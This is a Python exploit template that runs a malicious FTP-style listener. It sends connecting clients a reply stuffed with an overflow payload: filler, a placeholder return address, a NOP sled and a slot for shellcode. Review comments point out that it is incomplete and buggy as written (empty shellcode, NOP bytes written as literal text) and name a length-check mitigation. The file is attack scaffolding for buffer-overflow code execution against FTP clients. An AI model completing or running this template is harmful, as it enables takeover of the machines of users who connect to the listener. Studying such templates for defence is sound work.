#!/usr/bin/env python
# $Id: template_exploit.py,v 1.0 2018/07/08 00:44:56 dhn Exp $

import sys
import socket
import struct
import argparse

class Exploit:
	"""TCP listener that plays a fixed, FTP-style server dialogue.

	Once a client connects, a scripted sequence of status lines is sent.
	The fourth line embeds the caller-supplied payload. Whatever the client
	sends is read and discarded, so the peer's input never changes what is
	sent back.
	"""

	def __init__(self, server, port, payload):
		"""Store the local bind address, the port and the payload to embed.

		Args:
			server: address handed to ``socket.bind`` (a local address).
			port: TCP port handed to ``socket.bind``.
			payload: text concatenated into the fourth status line.
		"""
		self._server = server
		self._port = port
		self._payload = payload

	def __listen(self):
		"""Open a listening socket, block for one client, return ``accept()``'s result.

		A new listening socket is created on every call and is not
		explicitly closed here.
		"""
		listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		listener.bind((self._server, self._port))
		listener.listen(5)
		accepted = listener.accept()
		return accepted

	def run(self):
		"""Serve the scripted dialogue until a socket error ends the process.

		This method has no normal return path: it loops until
		``socket.error`` is raised, then prints "[+] Done" and exits with
		status 0. That message therefore only means a socket call failed,
		not that the whole dialogue was delivered.
		"""
		while True:
			try:
				client, peer = self.__listen()
				client.send("220 Welcome!\r\n")
				# Each recv() only paces the exchange; the data is ignored.
				for status_line in ("331 OK.\r\n", "230 OK.\r\n"):
					client.recv(1024)
					client.send(status_line)
				client.recv(1024)
				# The one line whose length is set by the caller's payload.
				client.send("220 " + self._payload + " is current directory\r\n")
				client.recv(1024)
				client.send("257\r\n")
			except socket.error:
				print("[+] Done")
				sys.exit(0)

def p(x):
	"""Pack *x* as a 4-byte little-endian unsigned integer.

	``struct`` raises ``struct.error`` if *x* does not fit in 32 unsigned
	bits.
	"""
	le_u32 = struct.Struct("<L")
	return le_u32.pack(x)

def nops(size=1024):
	"""Return *size* repetitions of the template's padding unit.

	As written, the unit is the four-character text backslash, "x", "9",
	"0" (the backslash in the literal is escaped), so the result is
	``4 * size`` characters long.
	"""
	unit = "\\x90"
	return "".join([unit] * size)

def main(args):
	"""Assemble the template payload and start the listener.

	Args:
		args: parsed command-line namespace providing ``host`` and ``port``.

	The payload is 2064 filler characters, one packed 32-bit little-endian
	word, the output of ``nops(1337)`` and the ``shellcode`` placeholder.
	The status line carrying it is therefore far longer than an ordinary
	FTP reply. The layout suggests the template targets a client that
	copies reply text into a fixed-size buffer without a length check
	(inferred, not shown here). Bounding reply length in the client is the
	corresponding mitigation.
	"""
	# TODO: Change me!
	shellcode = ()
	# NOTE(review): the placeholder above is an empty tuple, so the final
	# concatenation below raises TypeError until the template is filled in.

	filler = "A" * 2064
	# 0xdeadbeef is a placeholder word, not a real address.
	call_esp = p(0xdeadbeef)

	# PAYLOAD
	# NOTE(review): joining str with struct.pack() output presumes Python 2
	# string semantics - confirm the intended interpreter.
	payload = filler + call_esp + nops(1337) + shellcode

	exploit = Exploit(args.host, int(args.port), payload)
	print("[+] FTP Client exploit")
	print("[+] Listen on %s:%s" % (args.host, args.port))

	# Exploit.run() loops until it calls sys.exit(), so as the code stands
	# neither message below is reached.
	failed = exploit.run()
	print("[!] Fail" if failed else "[+] Done")


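if __name__ == "__main__":
	# Command-line entry point.
	#
	# --host is handed to socket.bind() by Exploit, so it selects the local
	# interface that accepts connections. It is not a remote target, and
	# the help text now says so. The chosen address decides which hosts can
	# reach the listener.
	#
	# --port is parsed as an integer, so a non-numeric value is rejected by
	# argparse with a usage message. main() still applies int() to it,
	# which is a no-op on an int.
	parser = argparse.ArgumentParser()
	parser.add_argument("--host", help="Local address to bind the listener to", required=True)
	parser.add_argument("--port", help="Local TCP port to listen on", type=int, required=True)
	args = parser.parse_args()

	main(args)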
